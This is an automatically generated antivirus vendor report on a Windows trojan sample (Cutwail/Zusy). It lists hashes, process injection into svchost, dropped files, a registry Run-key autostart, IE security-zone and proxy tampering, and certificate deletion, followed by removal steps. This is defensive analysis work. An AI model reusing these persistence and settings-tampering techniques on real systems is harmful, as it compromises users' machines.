Trojan.Win32.Cutwail.chu (Kaspersky), Gen:Variant.Zusy.80539 (B) (Emsisoft), Gen:Variant.Zusy.80539 (AdAware), GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 368c6271e7c7a0b02a0daa256a2aa283
SHA1: 88c782c4ec6e4456a649d61c863b79a41d57af73
SHA256: 3b9f5ce74cf866baf9a2a209d0ad4b3c25fd85728c0157a2806b011f177dc7b5
SSDeep: 768:4TbKtBVOrAHIR5/fNQuYMqV76ckaZ9Yz2WjEIFoE3AwkV5u9:ZVaz3/fNUVfkarYs 3AwyE9
Size: 48128 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Rapiddown
Created at: 2014-01-16 13:34:07
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1880
The Trojan injects its code into the following process(es):
JRY7B2.tmp:3796
svchost.exe:1876
svchost.exe:2960
File activity
The process %original file name%.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\teknorhino[1].htm (15 bytes)
%Documents and Settings%\%current user%\zygyspypjysl.exe (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (13 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@screaminpeach[1].txt (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigjohnsbeefjerky[1].txt (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\sortedorganizing[1].htm (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@plus[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\JRY7B2.tmp (62 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (881 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@genmar.gen[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@altonhousehotel[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@traderush[1].txt (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@shipeliteexpress[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@stepnet[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\slf6E4C.tmp.bat (123 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10020 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tavdi[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\suspendedpage[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (20 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (0 bytes)
The process JRY7B2.tmp:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigtopmultimedia[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sdlp[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\sydney[1].htm (357 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@taykon[1].txt (219 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@istanbultarim.com[1].txt (239 bytes)
%Documents and Settings%\%current user%\sufkywiddeax.exe (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@racknstackwarehouse.com[1].txt (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wsipowerontheweb[1].txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@theautospas[1].txt (230 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@starmedia[1].txt (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (19 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@goodvaluecenter[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@neurotoxininstitute[1].txt (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (197 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cbsprinting.com[1].txt (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\solutioncorp[1].htm (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (28 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@golfpark-moossee[1].txt (281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (20 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@teasing-video[1].txt (233 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@paintball[1].txt (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\authentica-travel[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\403[1].htm (883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\mibsga[1].htm (619 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bigtopmultimedia[1].htm (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@telenavis[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doctsf[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (29 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (22728 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@westhillsstl[1].txt (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ctr4process[2].txt (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (3 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\audience-web[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\fabianonline[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (0 bytes)
Registry activity
The process %original file name%.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "7A 52 2A 02 D9 25 FC D4 AC 84 5C 34 0C 57 2F 07"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"zygyspypjyslzap" = "B6 8E 66 3E 89 61 39 11 E8 C0 98 70 BB 93 6B 43"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A A8 EB FC 62 9B 3E 7E DE 90 9D EF DE EE 8E 87"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime" = "F5 B1 58 71"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl"
The process JRY7B2.tmp:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 6F 7E 74 A3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "A8 80 58 30 08 DF B7 8F 67 3F 17 EE C6 9E 76 C1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 86 46 3B DF 0F 73 D7 A8 65 AD B9 5C 26 80 FE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"sufkywiddeaxzap" = "88 60 38 10 E7 BF 97 6F 47 1F F6 CE A6 7E 56 2E"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates]
"E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime"
Dropped PE files
MD5 | File path |
---|---|
0a0dcf2f3b12bc676ca93e49b573690d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\JRY7B2.tmp |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1880
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\teknorhino[1].htm (15 bytes)
%Documents and Settings%\%current user%\zygyspypjysl.exe (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (13 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@screaminpeach[1].txt (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigjohnsbeefjerky[1].txt (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\sortedorganizing[1].htm (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@plus[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\JRY7B2.tmp (62 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (881 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@genmar.gen[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@altonhousehotel[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@traderush[1].txt (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@shipeliteexpress[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@stepnet[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\slf6E4C.tmp.bat (123 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10020 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tavdi[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\suspendedpage[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigtopmultimedia[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sdlp[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\sydney[1].htm (357 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@taykon[1].txt (219 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@istanbultarim.com[1].txt (239 bytes)
%Documents and Settings%\%current user%\sufkywiddeax.exe (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@racknstackwarehouse.com[1].txt (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wsipowerontheweb[1].txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@theautospas[1].txt (230 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
